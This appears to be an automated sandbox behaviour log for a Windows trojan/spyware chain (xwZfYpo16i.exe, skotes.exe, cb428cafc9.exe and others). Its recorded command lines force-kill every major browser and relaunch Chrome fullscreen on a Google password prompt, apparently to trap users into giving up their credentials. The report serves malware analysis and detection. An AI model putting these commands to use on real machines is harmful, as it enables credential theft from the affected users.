Source: num.exe, 00000016.00000000.2723183290.000000000065E000.00000002.00000001.01000000.0000000C.sdmp, num.exe, 00000016.00000002.2737087239.000000000065E000.00000002.00000001.01000000.0000000C.sdmp, num.exe, 00000029.00000000.2885267720.000000000065E000.00000002.00000001.01000000.0000000C.sdmp, num.exe, 00000029.00000002.2898365408.000000000065E000.00000002.00000001.01000000.0000000C.sdmp, num[1].exe.6.dr, num.exe.6.dr Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@174/15@45/12
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Code function: 7_2_00EB37B5 GetLastError,FormatMessageW, 7_2_00EB37B5
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Code function: 7_2_00EA10BF AdjustTokenPrivileges,CloseHandle, 7_2_00EA10BF
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Code function: 7_2_00EA16C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 7_2_00EA16C3
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Code function: 7_2_00EB51CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode, 7_2_00EB51CD
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Code function: 7_2_00ECA67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle, 7_2_00ECA67C
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Code function: 7_2_00EB648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize, 7_2_00EB648E
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Code function: 7_2_00E442A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource, 7_2_00E442A2
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6760:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5260:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:652:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5308:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5848:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:320:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3552:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2616:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3660:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6168:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3836:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6332:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2504:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1476:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7112:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5996:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4028:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6844:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1896:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6148:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6828:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2408:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1244:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6516:120:WilError_03
Source: C:\Users\user\Desktop\xwZfYpo16i.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985 Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Users\user\Desktop\xwZfYpo16i.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\xwZfYpo16i.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: xwZfYpo16i.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: 4db5303091.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: 4db5303091.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\xwZfYpo16i.exe File read: C:\Users\user\Desktop\xwZfYpo16i.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\xwZfYpo16i.exe "C:\Users\user\Desktop\xwZfYpo16i.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\Desktop\xwZfYpo16i.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe "C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe"
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --start-fullscreen --no-first-run --disable-session-crashed-bubble --disable-infobars
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1964,i,16714315343876232385,13045965869128810005,262144 /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1000336001\num.exe "C:\Users\user\AppData\Local\Temp\1000336001\num.exe"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5612 --field-trial-handle=1964,i,16714315343876232385,13045965869128810005,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5548 --field-trial-handle=1964,i,16714315343876232385,13045965869128810005,262144 /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe "C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe "C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe"
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5172 --field-trial-handle=1964,i,16714315343876232385,13045965869128810005,262144 /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --start-fullscreen --no-first-run --disable-session-crashed-bubble --disable-infobars
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1876 --field-trial-handle=2016,i,9763649198199615889,4058380472595766421,262144 /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1000336001\num.exe "C:\Users\user\AppData\Local\Temp\1000336001\num.exe"
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=2456 --field-trial-handle=1964,i,16714315343876232385,13045965869128810005,262144 /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --start-fullscreen --no-first-run --disable-session-crashed-bubble --disable-infobars
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 --field-trial-handle=2004,i,8592830290365317448,7467397625344037838,262144 /prefetch:8
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe "C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe"
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=2456 --field-trial-handle=1964,i,16714315343876232385,13045965869128810005,262144 /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --start-fullscreen --no-first-run --disable-session-crashed-bubble --disable-infobars
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 --field-trial-handle=2056,i,1132564284520540060,11615293102951086546,262144 /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe "C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe"
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5364 --field-trial-handle=1964,i,16714315343876232385,13045965869128810005,262144 /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5528 --field-trial-handle=1964,i,16714315343876232385,13045965869128810005,262144 /prefetch:8
Source: C:\Users\user\Desktop\xwZfYpo16i.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe "C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1000336001\num.exe "C:\Users\user\AppData\Local\Temp\1000336001\num.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T Jump to behavior
